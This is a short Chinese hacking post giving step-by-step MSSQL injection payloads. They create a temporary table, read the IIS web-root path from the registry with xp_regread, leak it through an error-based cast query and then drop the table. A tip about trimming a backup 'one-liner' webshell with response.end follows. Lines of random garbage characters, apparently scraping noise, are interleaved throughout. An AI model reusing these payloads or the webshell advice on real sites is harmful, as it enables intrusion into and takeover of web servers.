DB权限暴出网站物理路径代码

admin

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
5 L# B7 M& s& x" b4 R# p
) f" P2 V, x! |7 F9 A. b
7 H  ^( ?9 s& \5 `4 K　　2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中
$ G" x3 J3 a; s4 a4 k/ f7 |
' B/ f- n/ U8 j& f+ ~( a7 g: `
8 o/ S, C- A' C! J8 O　　3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
2 }/ P2 a* n: w7 i
- r1 M/ V6 Q. D! p! e0 U
8 C) C1 P$ i" G( b7 ]' @# z　　4、drop table [jm_tmp]-- 删除此表。


! g3 D2 p. m5 Z: Y另附上备分专用一句话
! ~' n) q3 R: ~　　加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.